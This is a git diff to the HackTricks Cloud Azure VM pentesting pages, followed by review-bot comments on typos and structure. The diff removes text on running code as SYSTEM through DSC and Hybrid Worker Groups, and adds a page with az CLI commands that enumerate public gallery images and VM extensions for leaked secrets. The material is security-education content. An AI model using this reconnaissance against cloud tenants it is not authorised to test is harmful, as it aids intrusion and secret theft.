The requirements include a **.PS1** file with a defined function and the file must be zipped into a **.zip** file. Even though the syntax might not be accurate for DSC, the code will still execute. However, the extension will mark the execution status as "failure," and no output from the command will be visible due to the status being overwritten by the failure message. +{% content-ref url="../../az-privilege-escalation/az-virtual-machines-and-network-privesc.md" %} +[az-virtual-machines-and-network-privesc.md](../../az-privilege-escalation/az-virtual-machines-and-network-privesc.md) +{% endcontent-ref %} -### Hybrid Worker Groups (HWGs) in Azure +## Unauthenticated Access -[**Hybrid Worker Groups (HWGs)**](https://docs.microsoft.com/en-us/azure/automation/automation-hybrid-runbook-worker) are a feature in Azure that allow Runbooks, configured in an Automation Account, to be executed on an Azure Virtual Machine (VM) that is part of the designated HWG. This execution is facilitated through an extension installed on the VM, which deploys the Runbook code onto the VM. A significant aspect of this process is that the actual credentials are not a factor in execution because the code runs with elevated privileges, specifically as **SYSTEM** or root, as illustrated in the provided figure. +{% content-ref url="../../az-unauthenticated-enum-and-initial-entry/az-vms-unath.md" %} +[az-vms-unath.md](../../az-unauthenticated-enum-and-initial-entry/az-vms-unath.md) +{% endcontent-ref %} -A crucial detail for those utilizing Windows 10 VMs is the necessity to specify the PowerShell version for the Runbook. It should be set to run as PowerShell Version 5.1 instead of 7.1. This requirement stems from the fact that PowerShell 7.1 is not installed by default on these VMs, leading to a failure in script execution if version 7.1 is specified. 
+## Pot Exploitation -This feature of Azure offers a robust method for automating and managing tasks across hybrid environments, allowing for centralized management and execution of tasks on Azure VMs. +{% content-ref url="../../az-post-exploitation/az-vms-and-network-post-exploitation.md" %} +[az-vms-and-network-post-exploitation.md](../../az-post-exploitation/az-vms-and-network-post-exploitation.md) +{% endcontent-ref %} ## References * [https://learn.microsoft.com/en-us/azure/virtual-machines/overview](https://learn.microsoft.com/en-us/azure/virtual-machines/overview) * [https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/](https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/) +* [https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service](https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service) {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md new file mode 100644 index 0000000000..2d7ddc48fb --- /dev/null +++ b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md @@ -0,0 +1,69 @@ +# Az - VMs Unath + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Virtual Machines + +For more info about Azure Virtual Machines check: + +{% content-ref url="../az-services/vms/" %} +[vms](../az-services/vms/) +{% endcontent-ref %} + +### Exposed vulnerable service + +A network service that is vulnerable to some RCE. + +### Public Gallery Images + +A public image might have secrets inside of it: + +{% code overflow="wrap" %} +```bash +# List all community galleries +az sig list-community --output table + +# Search by publisherUri +az sig list-community --output json --query "[?communityMetadata.publisherUri=='https://3nets.io']" +``` +{% endcode %} + +### Public Extensions + +This would be more weird but not impossible. A big company might put an extension with sensitive data inside of it: + +```bash +# It takes some mins to run +az vm extension image list --output table + +# Get extensions by publisher +az vm extension image list --publisher "Site24x7" --output table +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %}
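Review bot: In the `@@ -418,11 +512,21 @@` hunk of `az-services/vms/README.md`, the added line "The permissions required are:" does not say which operation needs them. It follows the unrelated sentence about there being no "marketplace" for vm apps, so a reader cannot tell whether the five permissions cover sharing a gallery, publishing an application version, or assigning the application to a VM. Suggest naming the operation in that lead-in sentence and, if the permissions belong to different steps, grouping the bullets by step. The spelling fix in the hint also leaves "Which is very interesting because ..." as a sentence fragment; joining it to the preceding sentence with a comma would resolve that.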
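Review bot: In the `@@ -574,40 +678,29 @@` hunk, the new heading `## Pot Exploitation` is a typo for "Post Exploitation". The same hunk deletes the "AAD Login in VM", "DesiredConfigurationState (DSC)" and "Hybrid Worker Groups (HWGs) in Azure" sections and leaves only three content-refs in their place, so please confirm that the removed text now lives in one of the linked pages rather than being dropped. The old top-level heading "Run commands in a VM" also disappears without a replacement, which is worth checking against any inbound anchor links.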
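Review bot: In the new file `az-vms-unath.md`, "Unath" in both the title `# Az - VMs Unath` and the file name looks like a typo for "Unauth". The path is already referenced by the content-ref this patch adds to `vms/README.md`, so renaming now is cheaper than after more links accumulate. Two smaller points in the same file: "### Exposed vulnerable service" has a one-sentence body with nothing a reader can act on, and the two filter examples hard-code specific third-party values (`https://3nets.io`, `Site24x7`) without saying why those were picked, where a placeholder such as `<publisher>` would be clearer. The first code block is wrapped in `{% code overflow="wrap" %}` and the second is not; pick one for consistency.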